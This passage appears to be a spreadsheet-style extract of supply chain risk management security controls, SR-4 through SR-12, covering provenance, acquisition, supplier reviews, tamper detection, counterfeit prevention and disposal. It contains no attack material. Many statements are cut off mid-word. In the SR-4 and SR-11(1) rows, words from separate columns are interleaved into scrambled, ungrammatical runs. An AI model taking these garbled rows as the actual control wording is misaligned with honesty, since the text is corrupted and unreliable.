organizations ensure th SR-5, SR-8.
configurations, employing approved vendor lists with standing reputations in industry,Employing
following a
SR-4 Provenance Document, monitor, and maintain valid provenance of the following systems, system components, anpre-agreed Every system and system schedules
maintenance component and hasupdate
a pointand of origin
patch and deliverymaymechanisms,
be changed throughoutmaintainingitsa existenc CM-8, MA-2, MA-6, RA-9, SA-3, SA-8, SI-4.
SR-4(1) Provenance | Identity Establish and maintain unique identification of the following supply chain elements, processes, and Knowing who and what is in the supply chains of organizations is critical to gaining visibility into IA-2, IA-8, PE-16.
SR-4(2) Provenance | Track and Trace Establish and maintain unique identification of the following systems and critical system componentsTracking the unique identification of systems and system components during development and transpor IA-2, IA-8, PE-16, PL-2.
SR-4(3) Provenance | Validate as Genuine and Not Altered Employ the following controls to validate that the system or system component received is genuine aFor many systems and system components, especially hardware, there are technical means to determine AT-3,i SR-9, SR-10, SR-11.
SR-4(4) Provenance | Supply Chain Integrity — Pedigree Employ [Assignment: organization-defined controls] and conduct [Assignment: organization-defined ana Authoritative information regarding the internal composition of system components and the provenance RA-3.
SR-5 Acquisition Strategies, Tools, and Methods Employ the following acquisition strategies, contract tools, and procurement methods to protect again The use of the acquisition process provides an important vehicle to protect the supply chain. There AT-3, SA-2, SA-3, SA-4, SA-5, SA-8, SA-9, SA-10, SA-15, SR-6, SR-9, SR-10, SR-11.
SR-5(1) Acquisition Strategies, Tools, and Methods | Adequate Supply Employ the following controls to ensure an adequate supply of [Assignment: organization-defined criAdversaries can attempt to impede organizational operations by disrupting the supply of critical sys RA-9.
SR-5(2) Acquisition Strategies, Tools, and Methods | Assessments Prior to Selection, Acceptance, ModificatioAssess the system, system component, or system service prior to selection, acceptance, modification,Organizational personnel or independent, external entities conduct assessments of systems, component CA-8, RA-5, SA-11, SI-7.
SR-6 Supplier Assessments and Reviews Assess and review the supply chain-related risks associated with suppliers or contractors and the s An assessment and review of supplier risk includes security and supply chain risk management processe SR-3, SR-5.
SR-6(1) Supplier Assessments and Reviews | Testing and Analysis Employ [Selection (one or more): organizational analysis; independent third-party analysis; organiza Relationships between entities and procedures within the supply chain, including development and deCA-8, SI-4.
SR-7 Supply Chain Operations Security Employ the following Operations Security (OPSEC) controls to protect supply chain-related informati Supply chain OPSEC expands the scope of OPSEC to include suppliers and potential suppliers. OPSEC isSC-38.
SR-8 Notification Agreements Establish agreements and procedures with entities involved in the supply chain for the system, syste The establishment of agreements and procedures facilitates communications among supply chain entitie IR-4, IR-6, IR-8.
SR-9 Tamper Resistance and Detection Implement a tamper protection program for the system, system component, or system service. Anti-tamper technologies, tools, and techniques provide a level of protection for systems, system co PE-3, PM-30, SA-15, SI-4, SI-7, SR-3, SR-4, SR-5, SR-10, SR-11.
SR-9(1) Tamper Resistance and Detection | Multiple Stages of System Development Life Cycle Employ anti-tamper technologies, tools, and techniques throughout the system development life cyclThe system development life cycle includes research and development, design, manufacturing, acquisiSA-3.
SR-10 Inspection of Systems or Components Inspect the following systems or system components [Selection (one or more): at random; at [Assign The inspection of systems or systems components for tamper resistance and detection addresses physic AT-3, PM-30, SI-4, SI-7, SR-3, SR-4, SR-5, SR-9, SR-11.
SR-11 Component Authenticity a. Develop and implement anti-counterfeit policy and procedures that include the means to detect Sources of counterfeit components include manufacturers, developers, vendors, and contractors. Anti- PE-3, SA-4, SI-7, SR-9, SR-10.
SR-11(1) Component Authenticity | Anti-counterfeit Training and
Trainprevent counterfeit
[Assignment: components from
organization-defined enteringor
personnel the system;
roles] and counterfeit system componentNone.
to detect AT-3.
SR-11(2) Component Authenticity | Configuration Control for Component Service and Repair Maintain configuration control over the following system components awaiting service or repair and None. CM-3, MA-2, MA-4, SA-10.
SR-11(3) Component Authenticity | Anti-counterfeit Scanning Scan for counterfeit system components [Assignment: organization-defined frequency]. The type of component determines the type of scanning to be conducted (e.g., web application scanniRA-5.
SR-12 Component Disposal Dispose of [Assignment: organization-defined data, documentation, tools, or system components] usData, documentation, tools, or system components can be disposed of at any time during the systemMP-6. d

14 of 2021-01-21